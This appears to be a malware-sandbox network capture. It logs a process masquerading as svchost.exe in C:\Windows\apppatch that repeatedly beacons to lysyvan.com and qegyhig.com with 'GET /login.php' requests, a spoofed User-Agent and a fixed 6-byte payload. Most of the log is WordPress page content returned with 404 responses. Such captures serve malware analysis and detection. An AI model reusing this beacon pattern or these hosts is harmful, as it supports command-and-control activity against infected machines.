2024-08-23 16:42:20 UTC	1369	IN	Data Raw: 3d 27 68 74 74 70 73 3a 2f 2f 71 65 67 79 68 69 67 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 61 73 74 72 61 2f 61 73 73 65 74 73 2f 63 73 73 2f 6d 69 6e 69 66 69 65 64 2f 6d 61 69 6e 2e 6d 69 6e 2e 63 73 73 3f 76 65 72 3d 34 2e 33 2e 31 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 73 74 79 6c 65 20 69 64 3d 27 61 73 74 72 61 2d 74 68 65 6d 65 2d 63 73 73 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 3e 0a 3a 72 6f 6f 74 7b 2d 2d 61 73 74 2d 63 6f 6e 74 61 69 6e 65 72 2d 64 65 66 61 75 6c 74 2d 78 6c 67 2d 70 61 64 64 69 6e 67 3a 33 65 6d 3b 2d 2d 61 73 74 2d 63 6f 6e 74 61 69 6e 65 72 2d 64 65 66 61 75 6c 74 2d 6c 67 2d 70 61 64 64 69 6e 67 3a 33 65 6d 3b 2d 2d 61 73 74 2d 63 6f 6e 74 61 69 6e 65 72 2d 64 65 66 61 75 6c 74 2d 73 Data Ascii: ='https://qegyhig.com/wp-content/themes/astra/assets/css/minified/main.min.css?ver=4.3.1' media='all' /><style id='astra-theme-css-inline-css'>:root{--ast-container-default-xlg-padding:3em;--ast-container-default-lg-padding:3em;--ast-container-default-s
2024-08-23 16:42:20 UTC	1369	IN	Data Raw: 68 74 3a 31 2e 34 65 6d 3b 7d 68 32 2c 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 33 32 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 36 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 32 35 65 6d 3b 7d 68 33 2c 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 36 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 36 32 35 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 36 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 32 65 6d 3b 7d 68 34 2c 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 68 34 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 34 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 32 Data Ascii: ht:1.4em;}h2,.entry-content h2{font-size:32px;font-size:2rem;font-weight:600;line-height:1.25em;}h3,.entry-content h3{font-size:26px;font-size:1.625rem;font-weight:600;line-height:1.2em;}h4,.entry-content h4{font-size:24px;font-size:1.5rem;line-height:1.2
2024-08-23 16:42:20 UTC	1369	IN	Data Raw: 30 34 30 34 3b 7d 2e 73 69 6e 67 6c 65 20 2e 6e 61 76 2d 6c 69 6e 6b 73 20 2e 6e 61 76 2d 70 72 65 76 69 6f 75 73 2c 2e 73 69 6e 67 6c 65 20 2e 6e 61 76 2d 6c 69 6e 6b 73 20 2e 6e 61 76 2d 6e 65 78 74 7b 63 6f 6c 6f 72 3a 23 64 31 30 34 30 34 3b 7d 2e 65 6e 74 72 79 2d 6d 65 74 61 2c 2e 65 6e 74 72 79 2d 6d 65 74 61 20 2a 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 35 3b 63 6f 6c 6f 72 3a 23 64 31 30 34 30 34 3b 7d 2e 65 6e 74 72 79 2d 6d 65 74 61 20 61 3a 68 6f 76 65 72 2c 2e 65 6e 74 72 79 2d 6d 65 74 61 20 61 3a 68 6f 76 65 72 20 2a 2c 2e 65 6e 74 72 79 2d 6d 65 74 61 20 61 3a 66 6f 63 75 73 2c 2e 65 6e 74 72 79 2d 6d 65 74 61 20 61 3a 66 6f 63 75 73 20 2a 2c 2e 70 61 67 65 2d 6c 69 6e 6b 73 20 3e 20 2e 70 61 67 65 2d 6c 69 6e 6b 2c 2e 70 61 67 65 Data Ascii: 0404;}.single .nav-links .nav-previous,.single .nav-links .nav-next{color:#d10404;}.entry-meta,.entry-meta {line-height:1.45;color:#d10404;}.entry-meta a:hover,.entry-meta a:hover ,.entry-meta a:focus,.entry-meta a:focus *,.page-links > .page-link,.page
2024-08-23 16:42:20 UTC	1369	IN	Data Raw: 6e 67 6c 65 2d 70 6f 73 74 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 75 61 67 62 2d 74 69 6d 65 6c 69 6e 65 20 61 2c 2e 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f 73 74 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 75 61 67 62 2d 74 6f 63 5f 5f 77 72 61 70 20 61 2c 2e 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f 73 74 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 75 61 67 62 2d 74 61 78 6f 6d 6f 6e 79 2d 62 6f 78 20 61 2c 2e 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f 73 74 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 20 61 2c 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 77 70 2d 62 6c 6f 63 6b 2d 6c 61 74 65 73 74 2d 70 6f 73 74 73 20 3e 20 6c 69 20 3e 20 61 2c 2e 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f 73 74 Data Ascii: ngle-post .entry-content .uagb-timeline a,.ast-single-post .entry-content .uagb-toc__wrap a,.ast-single-post .entry-content .uagb-taxomony-box a,.ast-single-post .entry-content .woocommerce a,.entry-content .wp-block-latest-posts > li > a,.ast-single-post
2024-08-23 16:42:20 UTC	1369	IN	Data Raw: 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 65 6d 61 69 6c 22 5d 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 75 72 6c 22 5d 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 70 61 73 73 77 6f 72 64 22 5d 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 72 65 73 65 74 22 5d 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 73 65 61 72 63 68 22 5d 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 6e 75 6d 62 65 72 22 5d 3a 66 6f 63 75 73 2c 74 65 78 74 61 72 65 61 3a 66 6f 63 75 73 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 61 72 63 68 5f 5f 69 6e 70 75 74 3a 66 6f 63 75 73 2c 5b 64 61 74 61 2d 73 65 63 74 69 6f 6e 3d 22 73 65 63 74 69 6f 6e 2d 68 65 61 64 65 72 2d 6d 6f 62 69 6c 65 2d 74 72 69 67 67 65 72 22 Data Ascii: focus,input[type="email"]:focus,input[type="url"]:focus,input[type="password"]:focus,input[type="reset"]:focus,input[type="search"]:focus,input[type="number"]:focus,textarea:focus,.wp-block-search__input:focus,[data-section="section-header-mobile-trigger"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49737	188.114.96.3	443	5284	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-23 16:42:28 UTC	267	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lysyvan.com Connection: Keep-Alive
2024-08-23 16:42:28 UTC	6	OUT	Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	60696	188.114.96.3	443	5284	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-23 16:43:01 UTC	267	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lysyvan.com Connection: Keep-Alive
2024-08-23 16:43:01 UTC	6	OUT	Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
2024-08-23 16:43:05 UTC	903	IN	HTTP/1.1 404 Not Found Date: Fri, 23 Aug 2024 16:43:05 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close vary: Accept-Encoding expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 link: <https://lysyvan.com/wp-json/>; rel="https://api.w.org/" server-timing: amp_sanitizer;dur="30.7",amp_style_sanitizer;dur="14.1",amp_tag_and_attribute_sanitizer;dur="11.3",amp_optimizer;dur="16.5" CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2Fs93R2NJP0o49EZuEgS3Ac38A9igF3GzJv%2B%2F7RfX%2Fn%2Bk4pnM7zYqlIdQvTinumMZRBXb2urxf93CHe84r9AwbiyUy4DFSHpRnV7eygSlbhmJP7D71DouRWzGQXezUQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8b7c8f288e754346-EWR alt-svc: h3=":443"; ma=86400
2024-08-23 16:43:05 UTC	466	IN	Data Raw: 37 63 32 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 64 61 74 61 2d 61 6d 70 2d 62 69 6e 64 2d 63 6c 61 73 73 3d 22 69 73 44 61 72 6b 20 3f 20 27 6e 65 76 65 2d 64 61 72 6b 2d 74 68 65 6d 65 27 20 3a 20 27 6e 65 76 65 2d 6c 69 67 68 74 2d 74 68 65 6d 65 27 22 20 63 6c 61 73 73 3d 22 6e 65 76 65 2d 64 61 72 6b 2d 74 68 65 6d 65 22 20 61 6d 70 3d 22 22 20 64 61 74 61 2d 61 6d 70 2d 61 75 74 6f 2d 6c 69 67 68 74 62 6f 78 2d 64 69 73 61 62 6c 65 20 74 72 61 6e 73 66 6f 72 6d 65 64 3d 22 73 65 6c 66 3b 76 3d 31 22 20 69 2d 61 6d 70 68 74 6d 6c 2d 6c 61 79 6f 75 74 3d 22 22 20 69 2d 61 6d 70 68 74 6d 6c 2d 6e 6f 2d 62 6f 69 6c 65 72 70 6c 61 74 65 3d 22 22 20 69 2d 61 6d 70 68 74 6d 6c 2d 62 Data Ascii: 7c2a<!DOCTYPE html><html lang="en-US" data-amp-bind-class="isDark ? 'neve-dark-theme' : 'neve-light-theme'" class="neve-dark-theme" amp="" data-amp-auto-lightbox-disable transformed="self;v=1" i-amphtml-layout="" i-amphtml-no-boilerplate="" i-amphtml-b
2024-08-23 16:43:05 UTC	1369	IN	Data Raw: 34 31 35 30 30 30 22 3e 68 74 6d 6c 7b 6f 76 65 72 66 6c 6f 77 2d 78 3a 68 69 64 64 65 6e 21 69 6d 70 6f 72 74 61 6e 74 7d 68 74 6d 6c 2e 69 2d 61 6d 70 68 74 6d 6c 2d 66 69 65 7b 68 65 69 67 68 74 3a 31 30 30 25 21 69 6d 70 6f 72 74 61 6e 74 3b 77 69 64 74 68 3a 31 30 30 25 21 69 6d 70 6f 72 74 61 6e 74 7d 68 74 6d 6c 3a 6e 6f 74 28 5b 61 6d 70 34 61 64 73 5d 29 2c 68 74 6d 6c 3a 6e 6f 74 28 5b 61 6d 70 34 61 64 73 5d 29 20 62 6f 64 79 7b 68 65 69 67 68 74 3a 61 75 74 6f 21 69 6d 70 6f 72 74 61 6e 74 7d 68 74 6d 6c 3a 6e 6f 74 28 5b 61 6d 70 34 61 64 73 5d 29 20 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 21 69 6d 70 6f 72 74 61 6e 74 7d 62 6f 64 79 7b 2d 77 65 62 6b 69 74 2d 74 65 78 74 2d 73 69 7a 65 2d 61 64 6a 75 73 74 3a 31 30 30 25 3b 2d 6d 6f 7a 2d 74 Data Ascii: 415000">html{overflow-x:hidden!important}html.i-amphtml-fie{height:100%!important;width:100%!important}html:not([amp4ads]),html:not([amp4ads]) body{height:auto!important}html:not([amp4ads]) body{margin:0!important}body{-webkit-text-size-adjust:100%;-moz-t
2024-08-23 16:43:05 UTC	1369	IN	Data Raw: 6d 70 68 74 6d 6c 2d 6c 69 67 68 74 62 6f 78 2d 65 6c 65 6d 65 6e 74 2c 23 69 2d 61 6d 70 68 74 6d 6c 2d 77 72 61 70 70 65 72 2b 62 6f 64 79 5b 69 2d 61 6d 70 68 74 6d 6c 2d 6c 69 67 68 74 62 6f 78 5d 7b 76 69 73 69 62 69 6c 69 74 79 3a 68 69 64 64 65 6e 7d 23 69 2d 61 6d 70 68 74 6d 6c 2d 77 72 61 70 70 65 72 2b 62 6f 64 79 5b 69 2d 61 6d 70 68 74 6d 6c 2d 6c 69 67 68 74 62 6f 78 5d 20 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6c 69 67 68 74 62 6f 78 2d 65 6c 65 6d 65 6e 74 7b 76 69 73 69 62 69 6c 69 74 79 3a 76 69 73 69 62 6c 65 7d 23 69 2d 61 6d 70 68 74 6d 6c 2d 77 72 61 70 70 65 72 2e 69 2d 61 6d 70 68 74 6d 6c 2d 73 63 72 6f 6c 6c 2d 64 69 73 61 62 6c 65 64 2c 2e 69 2d 61 6d 70 68 74 6d 6c 2d 73 63 72 6f 6c 6c 2d 64 69 73 61 62 6c 65 64 7b 6f 76 65 72 66 6c Data Ascii: mphtml-lightbox-element,#i-amphtml-wrapper+body[i-amphtml-lightbox]{visibility:hidden}#i-amphtml-wrapper+body[i-amphtml-lightbox] .i-amphtml-lightbox-element{visibility:visible}#i-amphtml-wrapper.i-amphtml-scroll-disabled,.i-amphtml-scroll-disabled{overfl
2024-08-23 16:43:05 UTC	1369	IN	Data Raw: 64 65 72 2d 62 61 63 6b 67 72 6f 75 6e 64 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 21 69 6d 70 6f 72 74 61 6e 74 7d 61 6d 70 2d 73 74 6f 72 79 2d 70 61 67 65 3a 6e 6f 74 28 3a 66 69 72 73 74 2d 6f 66 2d 74 79 70 65 29 3a 6e 6f 74 28 5b 64 69 73 74 61 6e 63 65 5d 29 3a 6e 6f 74 28 5b 61 63 74 69 76 65 5d 29 7b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 59 28 31 30 30 30 76 68 29 21 69 6d 70 6f 72 74 61 6e 74 7d 61 6d 70 2d 61 75 74 6f 63 6f 6d 70 6c 65 74 65 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 21 69 6d 70 6f 72 74 61 6e 74 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 21 69 6d 70 6f 72 74 61 6e 74 7d 61 6d 70 2d 61 75 74 6f 63 6f 6d 70 6c 65 74 65 3e 69 6e 70 75 74 2c 61 6d 70 2d 61 75 74 6f 63 6f 6d 70 6c 65 Data Ascii: der-background{display:none!important}amp-story-page:not(:first-of-type):not([distance]):not([active]){transform:translateY(1000vh)!important}amp-autocomplete{position:relative!important;display:inline-block!important}amp-autocomplete>input,amp-autocomple
2024-08-23 16:43:05 UTC	1369	IN	Data Raw: 68 5d 5b 68 65 69 67 68 74 5d 3a 6e 6f 74 28 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6c 61 79 6f 75 74 2d 69 6e 74 72 69 6e 73 69 63 29 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 30 25 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6c 61 79 6f 75 74 2d 69 6e 74 72 69 6e 73 69 63 20 2e 69 2d 61 6d 70 68 74 6d 6c 2d 73 69 7a 65 72 7b 6d 61 78 2d 77 69 64 74 68 3a 31 30 30 25 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 69 6e 74 72 69 6e 73 69 63 2d 73 69 7a 65 72 7b 6d 61 78 2d 77 69 64 74 68 3a 31 30 30 25 3b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6c 61 79 6f 75 74 2d 63 6f 6e 74 61 69 6e 65 72 2c 2e 69 2d Data Ascii: h][height]:not(.i-amphtml-layout-intrinsic){display:inline-block;position:relative;max-width:100%}.i-amphtml-layout-intrinsic .i-amphtml-sizer{max-width:100%}.i-amphtml-intrinsic-sizer{max-width:100%;display:block!important}.i-amphtml-layout-container,.i-
2024-08-23 16:43:05 UTC	1369	IN	Data Raw: 6c 2d 6c 61 79 6f 75 74 2d 73 69 7a 65 2d 64 65 66 69 6e 65 64 20 2e 69 2d 61 6d 70 68 74 6d 6c 2d 66 69 6c 6c 2d 63 6f 6e 74 65 6e 74 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 74 6f 70 3a 30 3b 6c 65 66 74 3a 30 3b 62 6f 74 74 6f 6d 3a 30 3b 72 69 67 68 74 3a 30 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 72 65 70 6c 61 63 65 64 2d 63 6f 6e 74 65 6e 74 2c 2e 69 2d 61 6d 70 68 74 6d 6c 2d 73 63 72 65 65 6e 2d 72 65 61 64 65 72 7b 70 61 64 64 69 6e 67 3a 30 21 69 6d 70 6f 72 74 61 6e 74 3b 62 6f 72 64 65 72 3a 6e 6f 6e 65 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 73 63 72 65 65 6e 2d 72 65 61 64 65 72 7b 70 6f 73 69 74 69 6f 6e 3a 66 69 78 65 64 21 69 6d 70 6f 72 74 61 6e 74 3b 74 6f 70 3a 30 70 78 21 69 6d 70 6f 72 74 61 6e Data Ascii: l-layout-size-defined .i-amphtml-fill-content{position:absolute;top:0;left:0;bottom:0;right:0}.i-amphtml-replaced-content,.i-amphtml-screen-reader{padding:0!important;border:none!important}.i-amphtml-screen-reader{position:fixed!important;top:0px!importan
2024-08-23 16:43:05 UTC	1369	IN	Data Raw: 5b 6c 61 79 6f 75 74 5d 29 3a 6e 6f 74 28 2e 69 2d 61 6d 70 68 74 6d 6c 2d 65 6c 65 6d 65 6e 74 29 3e 2a 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 61 6d 70 2d 69 6d 67 3a 6e 6f 74 28 2e 69 2d 61 6d 70 68 74 6d 6c 2d 65 6c 65 6d 65 6e 74 29 5b 69 2d 61 6d 70 68 74 6d 6c 2d 73 73 72 5d 3e 69 6d 67 2e 69 2d 61 6d 70 68 74 6d 6c 2d 66 69 6c 6c 2d 63 6f 6e 74 65 6e 74 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6e 6f 74 62 75 69 6c 74 3a 6e 6f 74 28 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6c 61 79 6f 75 74 2d 63 6f 6e 74 61 69 6e 65 72 29 2c 5b 6c 61 79 6f 75 74 5d 3a 6e 6f 74 28 5b 6c 61 79 6f 75 74 3d 63 6f 6e 74 61 69 6e 65 72 5d 29 3a 6e 6f 74 28 2e 69 2d 61 6d 70 68 74 6d 6c 2d 65 6c 65 6d 65 6e 74 29 2c 5b 77 69 64 74 68 5d 5b Data Ascii: [layout]):not(.i-amphtml-element)>*{display:none}amp-img:not(.i-amphtml-element)[i-amphtml-ssr]>img.i-amphtml-fill-content{display:block}.i-amphtml-notbuilt:not(.i-amphtml-layout-container),[layout]:not([layout=container]):not(.i-amphtml-element),[width][
2024-08-23 16:43:05 UTC	1369	IN	Data Raw: 72 79 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 65 6c 65 6d 65 6e 74 2d 65 72 72 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 72 65 64 21 69 6d 70 6f 72 74 61 6e 74 3b 63 6f 6c 6f 72 3a 23 66 66 66 21 69 6d 70 6f 72 74 61 6e 74 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 65 6c 65 6d 65 6e 74 2d 65 72 72 6f 72 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 61 74 74 72 28 65 72 72 6f 72 2d 6d 65 73 73 61 67 65 29 7d 69 2d 61 6d 70 2d 73 63 72 6f 6c 6c 2d 63 6f 6e 74 61 69 6e 65 72 2c 69 2d 61 6d 70 68 74 6d 6c 2d 73 63 72 6f 6c 6c 2d 63 6f 6e 74 61 69 6e 65 72 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 74 6f Data Ascii: ry{display:none!important}.i-amphtml-element-error{background:red!important;color:#fff!important;position:relative!important}.i-amphtml-element-error:before{content:attr(error-message)}i-amp-scroll-container,i-amphtml-scroll-container{position:absolute;to
2024-08-23 16:43:05 UTC	1369	IN	Data Raw: 72 5d 2c 66 6f 72 6d 20 5b 73 75 62 6d 69 74 2d 73 75 63 63 65 73 73 5d 2c 66 6f 72 6d 20 5b 73 75 62 6d 69 74 74 69 6e 67 5d 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 61 6d 70 2d 61 63 63 6f 72 64 69 6f 6e 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 21 69 6d 70 6f 72 74 61 6e 74 7d 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 31 70 78 29 7b 3a 77 68 65 72 65 28 61 6d 70 2d 61 63 63 6f 72 64 69 6f 6e 3e 73 65 63 74 69 6f 6e 29 3e 3a 66 69 72 73 74 2d 63 68 69 6c 64 7b 6d 61 72 67 69 6e 3a 30 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 65 66 65 66 65 66 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 70 78 3b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 64 66 64 66 64 66 7d 3a 77 68 65 72 65 28 61 6d 70 2d 61 63 63 6f 72 64 Data Ascii: r],form [submit-success],form [submitting]{display:none}amp-accordion{display:block!important}@media (min-width:1px){:where(amp-accordion>section)>:first-child{margin:0;background-color:#efefef;padding-right:20px;border:1px solid #dfdfdf}:where(amp-accord

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	59539	188.114.96.3	443	5284	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-23 16:43:35 UTC	267	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qegyhig.com Connection: Keep-Alive
2024-08-23 16:43:35 UTC	6	OUT	Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
2024-08-23 16:43:36 UTC	761	IN	HTTP/1.1 404 Not Found Date: Fri, 23 Aug 2024 16:43:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close vary: Accept-Encoding expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 link: <https://qegyhig.com/wp-json/>; rel="https://api.w.org/" CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=W0K0qMHJ06ql1CRX%2BJoo6v9MRttnzEL9yWM39K4UkHuiknRYNMTfVRtUkWMpEQ8N3C%2FKteR%2FHUcU7cYPIyyWyn9%2Fjs98en5iznJTwOtUxNXUVjJN3mVrRejEVd5GDA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8b7c8ffbc816434a-EWR alt-svc: h3=":443"; ma=86400
2024-08-23 16:43:36 UTC	608	IN	Data Raw: 37 63 62 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 20 0a 09 20 3c 73 74 79 6c 65 3e 0d 0a 23 77 70 61 64 6d 69 6e 62 61 72 20 23 77 70 2d 61 64 6d 69 6e 2d 62 61 72 2d 77 63 63 70 5f 66 72 65 65 5f 74 6f 70 5f 62 75 74 74 6f 6e 20 2e Data Ascii: 7cb8<!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="profile" href="https://gmpg.org/xfn/11"> <style>#wpadminbar #wp-admin-bar-wccp_free_top_button .
2024-08-23 16:43:36 UTC	1369	IN	Data Raw: 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 65 6e 5f 55 53 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 2d 22 20 2f 3e 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6c 64 2b 6a 73 6f 6e 22 20 63 6c 61 73 73 3d 22 79 6f 61 73 74 2d 73 63 68 65 6d 61 2d 67 72 61 70 68 22 3e 7b 22 40 63 6f 6e 74 65 78 74 22 3a 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 22 2c 22 40 67 72 61 70 68 22 3a 5b 7b 22 40 74 79 70 65 22 3a 22 57 65 62 53 69 74 65 22 2c 22 40 69 64 22 3a 22 68 74 74 70 73 3a 2f 2f 71 65 Data Ascii: </title><meta property="og:locale" content="en_US" /><meta property="og:title" content="Page not found -" /><script type="application/ld+json" class="yoast-schema-graph">{"@context":"https://schema.org","@graph":[{"@type":"WebSite","@id":"https://qe
2024-08-23 16:43:36 UTC	1369	IN	Data Raw: 2e 66 69 6c 6c 54 65 78 74 28 74 2c 30 2c 30 29 3b 76 61 72 20 74 3d 6e 65 77 20 55 69 6e 74 33 32 41 72 72 61 79 28 65 2e 67 65 74 49 6d 61 67 65 44 61 74 61 28 30 2c 30 2c 65 2e 63 61 6e 76 61 73 2e 77 69 64 74 68 2c 65 2e 63 61 6e 76 61 73 2e 68 65 69 67 68 74 29 2e 64 61 74 61 29 2c 72 3d 28 65 2e 63 6c 65 61 72 52 65 63 74 28 30 2c 30 2c 65 2e 63 61 6e 76 61 73 2e 77 69 64 74 68 2c 65 2e 63 61 6e 76 61 73 2e 68 65 69 67 68 74 29 2c 65 2e 66 69 6c 6c 54 65 78 74 28 6e 2c 30 2c 30 29 2c 6e 65 77 20 55 69 6e 74 33 32 41 72 72 61 79 28 65 2e 67 65 74 49 6d 61 67 65 44 61 74 61 28 30 2c 30 2c 65 2e 63 61 6e 76 61 73 2e 77 69 64 74 68 2c 65 2e 63 61 6e 76 61 73 2e 68 65 69 67 68 74 29 2e 64 61 74 61 29 29 3b 72 65 74 75 72 6e 20 74 2e 65 76 65 72 79 28 66 Data Ascii: .fillText(t,0,0);var t=new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data),r=(e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(n,0,0),new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data));return t.every(f
